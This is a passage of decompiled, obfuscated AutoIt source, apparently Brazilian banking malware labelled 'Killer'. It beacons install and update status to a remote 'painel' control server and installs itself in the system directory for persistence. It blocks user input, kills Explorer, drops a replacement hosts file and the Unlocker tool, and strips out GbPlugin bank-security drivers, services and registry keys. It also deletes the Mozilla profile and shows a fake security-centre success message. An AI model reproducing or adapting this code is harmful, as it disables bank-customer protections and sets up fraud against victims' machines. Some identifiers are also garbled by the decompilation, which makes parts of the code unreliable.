$Var0121, $Var0118) Global Const $Var0124 = BitOR($Var0119, $Var0118, $Var0120) Global Const $Var0125 = BitOR($Var0119, $Var0118, $Var0121) Global Const $Var0126 = BitOR($Var0119, $Var0122, $Var0120) Global Const $Var0127 = BitOR($Var0119, $Var0122, $Var0121) Global Const $Var0128 = 0x00020000 Global Const $Var0129 = 0x00080000 Global Const $Var0130 = 0x00c00000 Global Const $Var0131 = 0x80000000 Global Const $Var0132 = 0x00000080 Global Const $Var0133 = 8 Global Const $Var0134 = 0x00000100 Global Const $Var0135 = BitOR($Var0128, $Var0130, $Var0131, $Var0129) Global Const $Var0136 = BitOR($Var0132, $Var0133, $Var0134) Global Const $Var0137 = 4 Global Const $Var0138 = 4 Global Const $Var0139 = 2 Global Const $Var0140 = 0x00000040 Global Const $Var0141 = 8 Global Const $Var0142 = 0x00000020 Global Const $Var0143 = 0x00000010 Global Const $Var0144 = 1 Global Const $Var0145 = 0x00000100 Global Const $Var0146 = 0x00000080 Global Const $Var0147 = BitOR($Var0138, $Var0139, $Var0140, $Var0141, $Var0142, $Var0143, $Var0144, $Var0145, $Var0146) Global Const $Var0148 = 4 Global Const $Var0149 = 0x00000040 Global Const $Var0150 = 0x00000020 Global Const $Var0151 = 0x00000080 Global Const $Var0152 = 1 Global Const $Var0153 = 8 Global Const $Var0154 = 0x00000100 Global Const $Var0155 = 2 Global Const $Var0156 = 0x00000010 Global Const $Var0157 = BitOR($Var0108, $Var0148, $Var0149, $Var0150, $Var0151, $Var0152, $Var0153, $Var0154, $Var0155, $Var0156) Global Const $Var0158 = 0x00000010 Global Const $Var0159 = 8 Global Const $Var0160 = 4 Global Const $Var0161 = 2 Global Const $Var0162 = 1 Global Const $Var0163 = BitOR($Var0105, $Var0158, $Var0159, $Var0160, $Var0161, $Var0162) Global Const $Var0164 = 4 Global Const $Var0165 = 0x00000020 Global Const $Var0166 = 8 Global Const $Var0167 = 1 Global Const $Var0168 = 0x00000100 Global Const $Var0169 = 0x00000040 Global Const $Var0170 = 2 Global Const $Var0171 = 0x00000200 Global Const $Var0172 = 0x00000010 Global Const $Var0173 = BitOR($Var0164, $Var0165, $Var0166, $Var0167, $Var0168, $Var0169, $Var0170, $Var0171, $Var0172) Global Const $Var0174 = 1 Global Const $Var0175 = 2 Global Const $Var0176 = 4 Global Const $Var0177 = 8 Global Const $Var0178 = 0x00000010 Global Const $Var0179 = 0x00000020 Global Const $Var0180 = 0x00000040 Global Const $Var0181 = 0x00000080 Global Const $Var0182 = 0x00000100 Global Const $Var0183 = 0x00000200 Global Const $Var0184 = 0x00000400 Global Const $Var0185 = 0x00000800 Global Const $Var0186 = 0x00002000 Global Const $Var0187 = BitOR($Var0174, $Var0175, $Var0176, $Var0177, $Var0178, $Var0179, $Var0180, $Var0181, $Var0182, $Var0183, $Var0184, $Var0185, $Var0186) Global Const $Var0188 = 1 Global Const $Var0189 = 4 Global Const $Var0190 = 2 Global Const $Var0191 = 0x00000010 Global Const $Var0192 = 8 Global Const $Var0193 = BitOR($Var0108, $Var0188, $Var0189, $Var0190, $Var0191, $Var0192) Global Const $Var0194 = 2 Global Const $Var0195 = 1 Global Const $Var0196 = BitOR($Var0108, $Var0194, $Var0195) Global Const $Var0197 = 0x00000020 Global Const $Var0198 = 4 Global Const $Var0199 = 8 Global Const $Var0200 = 0x00000010 Global Const $Var0201 = 1 Global Const $Var0202 = 2 Global Const $Var0203 = BitOR($Var0106, $Var0199, $Var0200, $Var0201) Global Const $Var0204 = BitOR($Var0107, $Var0198, $Var0202) Global Const $Var0205 = BitOR($Var0105, $Var0197, $Var0198, $Var0199, $Var0200, $Var0201, $Var0202) Global Const $Var0206 = 1 Global Const $Var0207 = 2 Global Const $Var0208 = 4 Global Const $Var0209 = BitOR($Var0206, $Var0207, $Var0208) Global Const $Var0210 = 0x00000010 Global Const $Var0211 = 0x00000200 Global Const $Var0212 = 0x00000400 Global Const $Var0213 = 4 Global Const $Var0214 = BitOR($Var0210, $Var0211, $Var0212, $Var0213) Global Const $Var0215 = 1 Global Const $Var0216 = 2 Global Const $Var0217 = 4 Global Const $Var0218 = 8 Global Const $Var0219 = 0x00000010 Global Const $Var0220 = 0x00000020 Global Const $Var0221 = 0x00000040 Global Const $Var0222 = 0x00000100 Global Const $Var0223 = BitOR($Var0215, $Var0216, $Var0217, $Var0219, $Var0220, $Var0221, $Var0222) Global Const $Var0224 = 0x00004000 Global Const $Var0225 = 0x00008000 Global Const $Var0226 = 0x00010000 Global Const $Var0227 = 0x00020000 Global Const $Var0228 = 0x00040000 Global Const $Var0229 = 0x00080000 Global Const $Var0230 = BitOR($Var0224, $Var0225, $Var0226, $Var0227, $Var0228, $Var0229) Global Const $Var0231 = 0x00400000 Global Const $Var0232 = 0x00800000 Global Const $Var0233 = 0x01000000 Global Const $Var0234 = 0x10000000 Global Const $Var0235 = 0x20000000 Global Const $Var0236 = 0x40000000 Global Const $Var0237 = BitOR($Var0218, $Var0226, $Var0228, $Var0231, $Var0232, $Var0234, $Var0235, $Var0236) Global Const $Var0238 = 0x80000000 Global Const $Var0239 = BitOR($Var0224, $Var0228, $Var0238, $Var0233) Global Const $Var0240 = 0 Global Const $Var0241 = 1 Global Const $Var0242 = 2 Global Const $Var0243 = 4 Global Const $Var0244 = BitOR($Var0240, $Var0241, $Var0242, $Var0243) Global Const $Var0245 = Fn0027() Global Const $Var0246 = "align 2;dword_ptr Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;hwnd hDC;dword Flags;ushort FromPage;ushort ToPage;ushort MinPage;ushort MaxPage;" & Fn0026(@AutoItX64, "uint", "ushort") & " Copies;ptr hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;ptr hPrintTemplate;ptr hSetupTemplate;" Func Fn0025($__01, $__02, $__03 = 0, $__04 = 0, $__05 = 0) Local $locVar0001 = "wstr" If NOT StringStripWS($__02, 3) Then $locVar0001 = "ptr" $__02 = 0 EndIf Local $locVar0002 = DllCall("kernel32.dll", "int", "MoveFileWithProgressW", "wstr", $__01, $locVar0001, $__02, "ptr", $__04, "long_ptr", $__05, "dword", $__03) If (@error) OR (NOT $locVar0002[0]) Then Return SetError(1, 0, 0) EndIf Return 1 EndFunc Func Fn0026($__01, $__02, $__03) If $__01 Then Return $__02 Else Return $__03 EndIf EndFunc Func Fn0027() Local $locVar0001 = DllStructCreate("dword;dword;dword;dword;dword;wchar[128]") DllStructSetData($locVar0001, 1, DllStructGetSize($locVar0001)) Local $locVar0002 = DllCall("kernel32.dll", "int", "GetVersionExW", "ptr", DllStructGetPtr($locVar0001)) If (@error) OR (NOT $locVar0002[0]) Then Return SetError(1, 0, 0) EndIf Return BitOR(BitShift(DllStructGetData($locVar0001, 2), -8), DllStructGetData($locVar0001, 3)) EndFunc Global Const $Var0247 = "dword Size;hwnd hWndOwnder;handle hInstance;dword rgbResult;ptr CustColors;dword Flags;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName" Global Const $Var0248 = "dword Size;hwnd hWndOwner;handle hDC;ptr LogFont;int PointSize;dword Flags;dword rgbColors;lparam CustData;" & "ptr fnHook;ptr TemplateName;handle hInstance;ptr szStyle;word FontType;int SizeMin;int SizeMax" Func Fn0028($__01, $__02 = 0) Local Const $locVar0001 = 0x000000b7 Local Const $locVar0002 = 1 Local $locVar0003 = 0 If BitAND($__02, 2) Then Local $locVar0004 = DllStructCreate("byte;byte;word;ptr[4]") Local $locVar0005 = DllCall("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $locVar0004, "dword", $locVar0002) If @error Then Return SetError(@error, @extended, 0) If $locVar0005[0] Then $locVar0005 = DllCall("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $locVar0004, "bool", 1, "ptr", 0, "bool", 0) If @error Then Return SetError(@error, @extended, 0) If $locVar0005[0] Then $locVar0003 = DllStructCreate($Var0102) DllStructSetData($locVar0003, 1, DllStructGetSize($locVar0003)) DllStructSetData($locVar0003, 2, DllStructGetPtr($locVar0004)) DllStructSetData($locVar0003, 3, 0) EndIf EndIf EndIf Local $locVar0006 = DllCall("kernel32.dll", "handle", "CreateMutexW", "struct*", $locVar0003, "bool", 1, "wstr", $__01) If @error Then Return SetError(@error, @extended, 0) Local $locVar0007 = DllCall("kernel32.dll", "dword", "GetLastError") If @error Then Return SetError(@error, @extended, 0) If $locVar0007[0] = $locVar0001 Then If BitAND($__02, 1) Then Return SetError($locVar0007[0], $locVar0007[0], 0) Else Exit - 1 EndIf EndIf Return $locVar0006[0] EndFunc Func Fn0029($__01, $__02 = "*", $__03 = 0, $__04 = 0, $__05 = 0, $__06 = 1, $__07 = "", $__08 = "") Local $locVar0001[0x00000064] = [0], $locVar0002[0x00000064] = [0], $locVar0003[0x00000064] = [0], $locVar0004[0x00000064] = [0], $locVar0005[0x00000064] = [1] Local $locVar0006 = "", $locVar0007, $locVar0008, $locVar0009, $locVar0010 = ".+", $locVar0011 = ":" Local $locVar0012, $locVar0013, $locVar0014 = "", $locVar0015, $locVar0016 Local $locVar0017[0x00000064][2] = [[0, 0]], $locVar0018, $locVar0019, $locVar0020 If NOT FileExists($__01) Then Return SetError(1, 1, "") If StringRight($__01, 1) = "\" Then $locVar0006 = "\" Else $__01 = $__01 & "\" EndIf $locVar0005[1] = $__01 If $__04 > 1 OR NOT IsInt($__04) Then Return SetError(1, 4, "") If $__04 < 0 Then StringReplace($__01, "\", "", 2) $locVar0007 = @extended - $__04 EndIf If $__02 = "*" Then $locVar0008 = ".+" Else If NOT Fn0030($locVar0008, $__02) Then Return SetError(1, 2, "") EndIf Switch $__03 Case 0 Switch $__04 Case 0 $locVar0010 = $locVar0008 EndSwitch Case 2 $locVar0010 = $locVar0008 EndSwitch If $__07 = "" Then $locVar0009 = ":" Else If NOT Fn0030($locVar0009, $__07) Then Return SetError(1, 7, "") EndIf Switch $__03 Case 0 Switch $__04 Case 0 $locVar0011 = $locVar0009 Case Else If $__08 <> "" Then If NOT Fn0030($locVar0011, $__08) Then Return SetError(1, 8, "") EndIf EndSwitch Case 2 $locVar0011 = $locVar0009 EndSwitch If NOT ($__03 = 0 OR $__03 = 1 OR $__03 = 2) Then Return SetError(1, 3, "") If NOT ($__05 = 0 OR $__05 = 1 OR $__05 = 2) Then Return SetError(1, 5, "") If NOT ($__06 = 0 OR $__06 = 1 OR $__06 = 2) Then Return SetError(1, 6, "") While $locVar0005[0] > 0 $locVar0015 = $locVar0005[$locVar0005[0]] $locVar0005[0] -= 1 Switch $__06 Case 1 $locVar0014 = StringReplace($locVar0015, $__01, "") Case 2 $locVar0014 = $locVar0015 EndSwitch $locVar0012 = FileFindFirstFile($locVar0015 & "*") If $__03 = 0 AND $__05 AND $__06 Then Fn0031($locVar0017, $locVar0014, $locVar0002[0] + 1) EndIf If $locVar0012 = -1 Then ContinueLoop EndIf While 1 $locVar0016 = FileFindNextFile($locVar0012) If @error Then ExitLoop EndIf $locVar0013 = @extended If $locVar0013 Then Select Case $__04 < 0 StringReplace($locVar0015, "\", "", 0, 2) If @extended < $locVar0007 Then ContinueCase EndIf Case $__04 = 1 If NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0005, $locVar0015 & $locVar0016 & "\") EndIf EndSelect EndIf If $__05 Then If $locVar0013 Then If StringRegExp($locVar0016, $locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0004, $locVar0014 & $locVar0016 & $locVar0006) EndIf Else If StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then If $locVar0015 = $__01 Then Fn0031($locVar0003, $locVar0014 & $locVar0016) Else Fn0031($locVar0002, $locVar0014 & $locVar0016) EndIf EndIf EndIf Else If $locVar0013 Then If $__03 <> 1 AND StringRegExp($locVar0016, $locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0001, $locVar0014 & $locVar0016 & $locVar0006) EndIf Else If $__03 <> 2 AND StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then Fn0031($locVar0001, $locVar0014 & $locVar0016) EndIf EndIf EndIf WEnd FileClVar0255e($locVar0012) WEnd If $__05 Then Switch $__03 Case 0 If $locVar0003[0] = 0 AND $locVar0004[0] = 0 Then Return SetError(1, 9, "") Case 1 If $locVar0003[0] = 0 AND $locVar0002[0] = 0 Then Return SetError(1, 9, "") Case 2 If $locVar0004[0] = 0 Then Return SetError(1, 9, "") EndSwitch Switch $__03 Case 2 ReDim $locVar0004[$locVar0004[0] + 1] $locVar0001 = $locVar0004 Fn0033($locVar0001) Case 1 If $__06 = 0 Then Fn0032($locVar0001, $locVar0003, $locVar0002) Fn0033($locVar0001) Else Fn0032($locVar0001, $locVar0003, $locVar0002, 1) EndIf Case 0 If $__06 = 0 Then Fn0032($locVar0001, $locVar0003, $locVar0002) $locVar0001[0] += $locVar0004[0] ReDim $locVar0004[$locVar0004[0] + 1] Fn0035($locVar0001, $locVar0004) Fn0033($locVar0001) Else Local $locVar0001[$locVar0002[0] + $locVar0003[0] + $locVar0004[0] + 1] $locVar0001[0] = $locVar0002[0] + $locVar0003[0] + $locVar0004[0] Fn0033($locVar0003, 1, $locVar0003[0]) For $a2fd190023a = 1 To $locVar0003[0] $locVar0001[$a2fd190023a] = $locVar0003[$a2fd190023a] Next Local $locVar0021 = $locVar0003[0] + 1 Fn0033($locVar0004, 1, $locVar0004[0]) For $a2fd190023a = 1 To $locVar0004[0] If $locVar0006 Then $locVar0018 = $locVar0004[$a2fd190023a] Else $locVar0018 = $locVar0004[$a2fd190023a] & "\" EndIf For $a21c4105628 = 1 To $locVar0017[0][0] If $locVar0018 = $locVar0017[$a21c4105628][0] Then ExitLoop Next $locVar0019 = $locVar0017[$a21c4105628][1] If $a21c4105628 = $locVar0017[0][0] Then $locVar0020 = $locVar0002[0] Else $locVar0020 = $locVar0017[$a21c4105628 + 1][1] - 1 EndIf If $__05 = 1 Then Fn0033($locVar0002, $locVar0019, $locVar0020) EndIf $locVar0001[$locVar0021] = $locVar0004[$a2fd190023a] $locVar0021 += 1 For $a21c4105628 = $locVar0019 To $locVar0020 $locVar0001[$locVar0021] = $locVar0002[$a21c4105628] $locVar0021 += 1 Next Next EndIf EndSwitch Else If $locVar0001[0] = 0 Then Return SetError(1, 9, "") ReDim $locVar0001[$locVar0001[0] + 1] EndIf Return $locVar0001 EndFunc Func Fn0030(ByRef $__01, $__02) If StringRegExp($__02, "\\|/|:|\<|\>|\|") Then Return 0 $__02 = StringReplace(StringStripWS(StringRegExpReplace($__02, "\s*;\s*", ";"), 3), ";", "|") $__02 = StringReplace(StringReplace(StringRegExpReplace($__02, "[][$^.{}()+\-]", "\\$0"), "?", "."), "*", ".*?") $__01 = "(?i)^(" & $__02 & ")\z" Return 1 EndFunc Func Fn0031(ByRef $__01, $__02, $__03 = -1) If $__03 = -1 Then $__01[0] += 1 If UBound($__01) <= $__01[0] Then ReDim $__01[UBound($__01) * 2] $__01[$__01[0]] = $__02 Else $__01[0][0] += 1 If UBound($__01) <= $__01[0][0] Then ReDim $__01[UBound($__01) * 2][2] $__01[$__01[0][0]][0] = $__02 $__01[$__01[0][0]][1] = $__03 EndIf EndFunc Func Fn0032(ByRef $__01, $__02, $__03, $__04 = 0) ReDim $__02[$__02[0] + 1] If $__04 = 1 Then Fn0033($__02) $__01 = $__02 $__01[0] += $__03[0] ReDim $__03[$__03[0] + 1] If $__04 = 1 Then Fn0033($__03) Fn0035($__01, $__03) EndFunc Func Fn0033(ByRef $__01, $__02 = 1, $__03 = -99) If $__03 = -0x00000063 Then $__03 = UBound($__01) - 1 Fn0034($__01, $__02, $__03) EndFunc Func Fn0034(ByRef $__01, ByRef $__02, ByRef $__03) Local $locVar0001 If ($__03 - $__02) < 15 Then Local $locVar0002, $locVar0003, $locVar0004 For $locVar0002 = $__02 + 1 To $__03 $locVar0001 = $__01[$locVar0002] If IsNumber($locVar0001) Then For $locVar0003 = $locVar0002 - 1 To $__02 Step -1 $locVar0004 = $__01[$locVar0003] If ($locVar0001 >= $locVar0004 AND IsNumber($locVar0004)) OR (NOT IsNumber($locVar0004) AND StringCompare($locVar0001, $locVar0004) >= 0) Then ExitLoop $__01[$locVar0003 + 1] = $locVar0004 Next Else For $locVar0003 = $locVar0002 - 1 To $__02 Step -1 If (StringCompare($locVar0001, $__01[$locVar0003]) >= 0) Then ExitLoop $__01[$locVar0003 + 1] = $__01[$locVar0003] Next EndIf $__01[$locVar0003 + 1] = $locVar0001 Next Return EndIf Local $locVar0005 = $__02, $locVar0006 = $__03, $locVar0007 = $__01[Int(($__02 + $__03) / 2)], $locVar0008 = IsNumber($locVar0007) Do If $locVar0008 Then While ($__01[$locVar0005] < $locVar0007 AND IsNumber($__01[$locVar0005])) OR (NOT IsNumber($__01[$locVar0005]) AND StringCompare($__01[$locVar0005], $locVar0007) < 0) $locVar0005 += 1 WEnd While ($__01[$locVar0006] > $locVar0007 AND IsNumber($__01[$locVar0006])) OR (NOT IsNumber($__01[$locVar0006]) AND StringCompare($__01[$locVar0006], $locVar0007) > 0) $locVar0006 -= 1 WEnd Else While (StringCompare($__01[$locVar0005], $locVar0007) < 0) $locVar0005 += 1 WEnd While (StringCompare($__01[$locVar0006], $locVar0007) > 0) $locVar0006 -= 1 WEnd EndIf If $locVar0005 <= $locVar0006 Then $locVar0001 = $__01[$locVar0005] $__01[$locVar0005] = $__01[$locVar0006] $__01[$locVar0006] = $locVar0001 $locVar0005 += 1 $locVar0006 -= 1 EndIf Until $locVar0005 > $locVar0006 Fn0034($__01, $__02, $locVar0006) Fn0034($__01, $locVar0005, $__03) EndFunc Func Fn0035(ByRef $__01, Const ByRef $__02) Local $locVar0001 = UBound($__01) - 1, $locVar0002 = UBound($__02) ReDim $__01[$locVar0001 + $locVar0002] For $a2fd190023a = 1 To $locVar0002 - 1 $__01[$locVar0001 + $a2fd190023a] = $__02[$a2fd190023a] Next EndFunc Global $Var0249 If NOT @Compiled Then Exit If (@ScriptFullPath <> @SystemDir & "\" & $Var0003) Then If Fn0028(@ScriptName) = 0 Then Exit EndIf While ProcessExists($Var0003) ProcessClVar0255e($Var0003) Sleep(0x000003e8) WEnd Local $Var0250 = FileGetVersion(@ScriptFullPath) If Fn0008($Var0001) Then If FileExists(@SystemDir & "\" & $Var0003) Then Local $Var0251 = FileGetVersion(@SystemDir & "\" & $Var0003) If $Var0250 <> $Var0251 Then InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Updated on " & @Var0255Version & ")") Else Exit EndIf EndIf While Fn0008($Var0001) Fn0040() Sleep(0x000003e8) WEnd Else InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Installed on " & @Var0255Version & ")") EndIf If FileExists(@ProgramFilesDir & "\gbplugin") Then FileCopy(@ScriptFullPath, @SystemDir & "\" & $Var0003, 1) Fn0039() DirCreate(@SystemDir & "\Unlocker") If @Var0255Arch = "X64" Then FileInstall("Unlocker1.9.1-x64\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1) FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1) FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerInject32.exe", @SystemDir & "\Unlocker\UnlockerInject32.exe", 1) Else FileInstall("Unlocker1.9.1\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1) FileInstall("Unlocker1.9.1\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1) EndIf If Fn0010($Var0001) = 1 Then DirRemove(@AppDataDir & "\Mozilla", 1) MsgBox(0, "Central de Segurança", "Programa instalado com sucesso.", 10) Sleep(0x0002bf20) EndIf Shutdown(6) Exit EndIf MsgBox(0, "Central de Segurança", "Programa não instalado.", 10) Exit EndIf Fn0017($Var0001) Func Fn0036() FileInstall("hVar0255ts", @WindowsDir & "\System32\DRIVERS\etc\hVar0255ts", 1) BlockInput(1) While ProcessExists("explorer.exe") ProcessClVar0255e("explorer.exe") Sleep(0x000001f4) WEnd RunWait(@SystemDir & "\sc config gbpkm start= disabled", "", @SW_HIDE) RunWait(@SystemDir & "\sc stop gbpkm", "", @SW_HIDE) RunWait(@SystemDir & "\sc delete gbpkm", "", @SW_HIDE) RunWait(@SystemDir & "\sc config gbpsv start= disabled", "", @SW_HIDE) RunWait(@SystemDir & "\sc stop gbpsv", "", @SW_HIDE) RunWait(@SystemDir & "\sc delete gbpsv", "", @SW_HIDE) ProcessClVar0255e("gbpsv.exe") Fn0042() Fn0037(@SystemDir & "\drivers\GbpKm.sys") Fn0037(@SystemDir & "\drivers\gbpndisrd.sys") Fn0037(@ProgramFilesDir & "\GbPlugin") Fn0037(@AppDataCommonDir & "\GbPlugin") Fn0037(@AppDataCommonDir & "\Gas") DirRemove(@ProgramFilesDir & "\GbPlugin", 1) DirRemove(@AppDataCommonDir & "\GbPlugin", 1) DirRemove(@AppDataCommonDir & "\Gas", 1) FileDelete(@SystemDir & "\drivers\GbpKm.sys.xx") FileDelete(@SystemDir & "\drivers\gbpndisrd.sys.xx") DirRemove(@ProgramFilesDir & "\GbPlugin.xx", 1) DirRemove(@AppDataCommonDir & "\GbPlugin.xx", 1) DirRemove(@AppDataCommonDir & "\Gas.xx", 1) Fn0042() Fn0038(@SystemDir & "\drivers\GbpKm.sys") Fn0038(@SystemDir & "\drivers\gbpndisrd.sys") Fn0038(@ProgramFilesDir & "\GbPlugin") Fn0038(@AppDataCommonDir & "\GbPlugin") Fn0038(@AppDataCommonDir & "\Gas") If @Var0255Version = "WIN_XP" Then FileInstall("snetcfg.exe", @SystemDir & "\snetcfg.exe", 1) RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE) RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrd", "", @SW_HIDE) Else RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE) RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrd", "", @SW_HIDE) EndIf If $Var0249 = "RESTART" Then RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "AllowProtectedRenames", "REG_SZ", "1") Shutdown(6) Else Fn0042() While ProcessExists("explorer.exe") = 0 ShellExecute("explorer.exe") Sleep(0x000003e8) WEnd BlockInput(0) Fn0040() EndIf EndFunc Func Fn0037($__01) RunWait(@SystemDir & '\Unlocker\Unlocker.exe "' & $__01 & '" -M "' & $__01 & '.xx" -S -O', @SystemDir & "\Unlocker", @SW_HIDE) EndFunc Func Fn0038($__01) If FileExists($__01) Then $Var0249 = "RESTART" If StringInStr(FileGetAttrib($__01), "D") Then $a04d540192d = Fn0029($__01, "*", 0, 1, 0, 2) For $a2fd190023a = 1 To $a04d540192d[0] Fn0025(FileGetShortName($a04d540192d[$a2fd190023a]), "", $Var0137) Next Else Fn0025(FileGetShortName($__01), "", $Var0137) EndIf EndIf EndFunc Func Fn0039() Fn0006($Var0001, $Var0002, BitOR($Var0037, $Var0040), $Var0042, $Var0043, '"' & @SystemDir & "\" & $Var0003 & '"') EndFunc Func Fn0040() Fn0011($Var0001) Fn0007($Var0001) EndFunc Func Fn0041($__01, $__02 = False) While ProcessExists("explorer.exe") ProcessClVar0255e("explorer.exe") Sleep(0x000001f4) WEnd If $__02 = False Then RegDelete($__01) Else RegDelete($__01, $__02) EndIf EndFunc Func Fn0042() Fn0041("HKLM\SYSTEM\ControlSet001\Services\Ndisrd") Fn0041("HKLM\SYSTEM\ControlSet002\Services\Ndisrd") Fn0041("HKLM\SYSTEM\ControlSet001\Services\NdisrdMP") Fn0041("HKLM\SYSTEM\ControlSet002\Services\NdisrdMP") Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpKm") Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpKm") Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpSv") Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpSv") Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}") Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}") Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRD") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRD") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRDMP") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRDMP") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}") Fn0041("HKCR\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}") Fn0041("HKCR\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKCR\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}") Fn0041("HKCR\CLSID\{32A5804C-50B2-4295-8252-C32751FE0008}") Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630000}") Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630003}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") 